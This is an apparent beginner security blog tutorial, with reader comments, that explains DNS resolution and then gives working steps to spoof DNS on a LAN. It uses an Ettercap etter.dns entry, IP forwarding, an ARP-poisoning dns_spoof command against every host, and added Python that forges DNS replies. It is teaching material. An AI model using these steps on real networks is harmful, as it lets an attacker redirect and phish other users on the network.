Infosec 101: DNS – What is it and How do I Spoof it?

July 8, 2016 | Views: 9918


DNS stands for Domain Name System. Its job is to translate the hostname you type into the address bar into an IP address.

When you enter www.google.com into the address bar, the name is first resolved to an IP address; only then does your browser open a connection to that address.

Here’s how the process goes:

1. You enter the hostname www.xyz.com into the address bar.

2. Your computer (its stub resolver) looks for the name in the local DNS cache and the hosts file. If there is no cached answer, it sends a DNS query.

3. The query is sent to a recursive name server – usually your ISP’s, or whichever resolver your network settings point to. Recursive servers keep their own cache and answer from it if they can.

4. If the recursive server doesn’t have the answer, it queries a root nameserver.

5. The root nameserver looks at the rightmost label of the name, the TLD (.com, .in, .us), and refers the recursive server to the nameservers for that TLD.

6. The recursive server then queries the top level domain (TLD) nameserver.

7. The TLD nameserver looks at the next label to the left (xyz) and refers the recursive server to the authoritative nameservers for that specific domain.

8. Finally, the recursive server queries the authoritative DNS servers. These hold the zone’s records (A, MX, etc.) and know everything there is to know about the domain. The recursive server retrieves the requested record, caches it for the record’s TTL, and hands it back to your computer.
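To make steps 2 and 8 concrete, here is an added example (my own code, not from the original post) that builds the A query a stub resolver sends for www.xyz.com and parses the kind of reply the recursive server returns, including the name-compression pointer that real replies use. The reply bytes and the 203.0.113.10 address are constructed for the example (a documentation range, not the real address of any host); the transaction ID is also made up.

```python
import struct

QTYPE_A = 1
QCLASS_IN = 1


def encode_name(name):
    """Encode a dotted hostname as DNS labels: b'\\x03www\\x03xyz\\x03com\\x00'."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("bad label length: %r" % label)
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_query(name, txid, qtype=QTYPE_A):
    """Standard query: 12-byte header (id, flags RD=1, QDCOUNT=1) + question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def decode_name(msg, offset):
    """Decode a possibly compressed name at offset (RFC 1035 4.1.4).
    Returns (name, offset just past the name as it appears in the message)."""
    labels = []
    end = None          # where the name ends in the message (set on first pointer)
    hops = 0
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                     # compression pointer
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            if end is None:
                end = offset + 2
            offset = pointer
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (offset if end is None else end)


def parse_response(msg):
    """Return (txid, rcode, questions, answers) from a DNS response message.
    answers is a list of (owner name, type, ttl, rdata); A rdata is dotted-quad."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    if not flags & 0x8000:
        raise ValueError("not a response (QR bit clear)")
    rcode = flags & 0x000F
    offset = 12
    questions = []
    for _ in range(qd):
        name, offset = decode_name(msg, offset)
        qtype, qclass = struct.unpack("!HH", msg[offset:offset + 4])
        offset += 4
        questions.append((name, qtype))
    answers = []
    for _ in range(an):
        name, offset = decode_name(msg, offset)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata = msg[offset:offset + rdlen]
        offset += rdlen
        if rtype == QTYPE_A and rdlen == 4:
            rdata = ".".join(str(b) for b in rdata)
        answers.append((name, rtype, ttl, rdata))
    return txid, rcode, questions, answers


# Constructed sample traffic (not a capture): the stub's query and a reply with
# the same txid, flags QR=1 RD=1 RA=1 (0x8180), one question and one A answer
# whose owner name is a pointer (0xC00C) back to the question name at offset 12.
SAMPLE_QUERY = build_query("www.xyz.com", txid=0x1A2B)
SAMPLE_RESPONSE = (
    struct.pack("!HHHHHH", 0x1A2B, 0x8180, 1, 1, 0, 0)
    + encode_name("www.xyz.com") + struct.pack("!HH", QTYPE_A, QCLASS_IN)
    + b"\xC0\x0C" + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, 300, 4)
    + bytes([203, 0, 113, 10])                      # made-up address
)

if __name__ == "__main__":
    print(SAMPLE_QUERY.hex())
    print(parse_response(SAMPLE_RESPONSE))
```

The only things tying the reply to the query are the 16-bit transaction ID, the question section and the UDP port it comes back on; that is worth keeping in mind for the spoofing section below.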

 

Common DNS records:

A = maps a hostname to an IPv4 address (forward lookup)

MX = mail exchange record – which hosts accept mail for the domain

PTR = maps an IP address back to a hostname (reverse lookup)

 

What’s a nameserver?

A server, permanently reachable on the internet, that answers DNS queries – for example translating a domain name into an IP address.

 

What’s Ettercap?

Ettercap is a free and open source network security tool for man-in-the-middle attacks on a LAN. It can sniff live connections, filter content on the fly, and be used for network protocol analysis and security auditing.

 

Spoofing DNS using Ettercap

The victim will try to connect to www.msn.com and instead will see a web page hosted by the attacker.

Scenario: 2 machines – Kali Linux and Windows 8

On Kali Linux

1. Locate the file named etter.dns:

# locate etter.dns

The file will be under /etc/ettercap. Open it with the nano editor.

Scroll down and you’ll see a comment line reading

wildcards in PTR are not allowed

followed by example entries. Add your own entry in the same format, for instance:

www.msn.com A 192.168.1.8

where A is the DNS record type and the IP address is that of your Kali Linux machine (adjust it to your own address).

Save and exit.

2. Enable IP forwarding, so that the traffic you intercept by ARP spoofing is still passed on to its real destination and the victim’s connection keeps working. Go to this directory:

/proc/sys/net/ipv4

There is a file named ip_forward in it. Open the file with nano and you’ll find that it’s set to 0. Change it to 1.

Save and exit. (This setting does not survive a reboot.)

3. Use the dns_spoof plugin of Ettercap:

# ettercap -T -q -M arp:remote -P dns_spoof //

-T selects the text interface, -q keeps it quiet, -M arp:remote performs the ARP-poisoning man-in-the-middle attack, -P dns_spoof loads the plugin that answers DNS queries from etter.dns, and // targets every host on the LAN. The plugin will start.

(enter q to quit)

(enter ettercap --help to see the options)

Go to your Windows machine and ping www.msn.com.

You’ll see that the replies come from 192.168.1.8 – the Kali machine – instead of msn.com’s real IP.

Similarly, if you enter www.msn.com in the browser on Windows, you’ll be redirected to the Kali Linux machine, where you can host your own page for malicious or non-malicious intent. Note that this only works for hosts on the same LAN, and only plain HTTP is redirected silently: for an HTTPS site the browser will show a certificate warning, because the attacker’s page cannot present a valid certificate for the spoofed name.

All of this will make much more sense if you familiarize yourself with ARP spoofing.
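To show what the etter.dns entry from step 1 turns into on the wire, here is an added example (my own code, not Ettercap’s dns_spoof source): it reads etter.dns-style lines and, given the victim’s raw A query, produces the forged reply – same transaction ID, same question section, QR and AA set, answer pointing at 192.168.1.8. Those fields are all a stub resolver checks (besides the UDP port the reply comes back on), which is why a reply that arrives first from an on-path attacker wins. The victim’s query, the 3600-second TTL, the flag bits and the single-level wildcard matching are assumptions made for this example; Ettercap’s own values may differ.

```python
import ipaddress
import struct

QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name):
    """Dotted hostname -> DNS label sequence."""
    return b"".join(bytes([len(l)]) + l.encode("ascii")
                    for l in name.rstrip(".").split(".")) + b"\x00"


def stub_query(name, txid):
    """The query a stub resolver sends: header with RD=1, one A/IN question."""
    return (struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
            + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN))


def parse_etter_dns(text):
    """Minimal parser for 'host TYPE value' lines as used in etter.dns.
    Comments (#) are ignored; A values must be IPv4 addresses; the file's own
    rule that wildcards are not allowed in PTR entries is enforced."""
    table = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) != 3:
            raise ValueError("expected 'host TYPE value': %r" % line)
        host, rtype, value = parts
        rtype = rtype.upper()
        if rtype == "PTR" and host.startswith("*"):
            raise ValueError("wildcards in PTR are not allowed")
        if rtype == "A":
            ipaddress.IPv4Address(value)        # raises on a malformed address
        table[(host.lower(), rtype)] = value
    return table


def lookup_spoof(table, name):
    """Exact match first, then a one-level wildcard such as '*.msn.com' (assumed)."""
    hit = table.get((name, "A"))
    if hit is None and "." in name:
        hit = table.get(("*." + name.split(".", 1)[1], "A"))
    return hit


def forge_reply(query, table, ttl=3600):
    """Build the forged response for a spoofed name, or return None if the query
    is not a single A/IN question for a name present in the spoof table."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", query[:12])
    if flags & 0x8000 or qd != 1:                  # must be a query, one question
        return None
    offset, labels = 12, []
    while query[offset] != 0:                      # queries carry no pointers
        n = query[offset]
        labels.append(query[offset + 1:offset + 1 + n].decode("ascii"))
        offset += 1 + n
    offset += 1
    qtype, qclass = struct.unpack("!HH", query[offset:offset + 4])
    question = query[12:offset + 4]                # copied verbatim into the reply
    if (qtype, qclass) != (QTYPE_A, QCLASS_IN):
        return None
    ip = lookup_spoof(table, ".".join(labels).lower())
    if ip is None:
        return None
    # 0x8580: QR=1 (response), AA=1, RD=1, RA=1, RCODE=0. One question, one answer.
    header = struct.pack("!HHHHHH", txid, 0x8580, 1, 1, 0, 0)
    answer = (b"\xC0\x0C"                          # owner name = pointer to question
              + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
              + ipaddress.IPv4Address(ip).packed)
    return header + question + answer


# Constructed spoof table in the etter.dns format, plus a made-up victim query.
SPOOF_TABLE = parse_etter_dns("""
# entries in the form used by /etc/ettercap/etter.dns
www.msn.com   A   192.168.1.8
*.msn.com     A   192.168.1.8
""")
VICTIM_QUERY = stub_query("www.msn.com", txid=0x4242)

if __name__ == "__main__":
    print(forge_reply(VICTIM_QUERY, SPOOF_TABLE).hex())
```

Because the question section and transaction ID are copied straight from the victim’s query, the forged reply parses exactly like a genuine one; the victim’s resolver caches 192.168.1.8 for www.msn.com for the whole TTL, which is why the ping in the verification step keeps answering from the Kali machine.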


That’s all for this post. Queries are welcome in the comments.

25 Comments
  1. Good directions, thank you for the post.
    Does Windows have a version of Ettercap? Can you go over how to do a DNS poison for both Windows machines?

  2. Thank you very much for your time and help, I really appreciate it.

  3. This should really be in a video because there’s not enough explanation. It almost reads as a shopping list.

    • I wish video tutorial was possible but it isn’t.
      Thanks for the feedback, I’ll try to make the next article more indulging and less like a ‘shopping list’.

    • I don’t really see where any user seriously looking into a future in IT related industry would struggle to comprehend or follow these directions to be honest.
      Sure it hasn’t been structured to be the most aesthetically pleasing of compositions but it outlines the necessary inputs, the order in which they are required, as well as an expected output……

  4. I have followed all the steps, but it does not work.

    • But both my machines are in VMware. Was that a problem?

      • The only thing to make sure of is that you are on the same network as the victim.
        Let’s say that your IP is 192.168.1.5.
        Now your victim should also have an IP in the range 192.168.1.x,
        where x can have values starting from 2 (192.168.1.2 for example).
        That’s all you need to take care of.
        If you are in the VM, look at the network connection settings and check whether the network connection is bridged or NAT.
        Make sure that either both are NAT or both are bridged.
        Just so you know, in the case of NAT the IP is provided by the VMware DHCP instead of your router.
        Follow the steps again and try to find out the exact step you are having a problem with.

  5. I didn’t get the first step.
    I am a beginner, could you please explain it in detail?
    Thanks

    • Ettercap is a Linux tool. In these steps it is not mentioned how to install Ettercap, so before starting, search for how to install Ettercap. After you have installed Ettercap, go to the mentioned directory, i.e. ‘/etc/ettercap’, and locate the file ‘etter.dns’. To edit the file using the ‘nano’ text editor, open the terminal and type “cd /etc/ettercap” without quotes and then type “nano etter.dns”, also without quotes. This will open the file and now you will be able to edit it. If you don’t want to use nano, or want to open the file with editors like gEdit or something else, just replace ‘nano’ with the name of your editor. Now you can follow the rest of the steps.

      ** If you are using Kali Linux, then Ettercap is already installed.

      • KRYPGUY, I appreciate you helping out a fellow Cybrarian.
        JOSHUA GEEK, try to follow what KRYPGUY told you and see if you can understand.

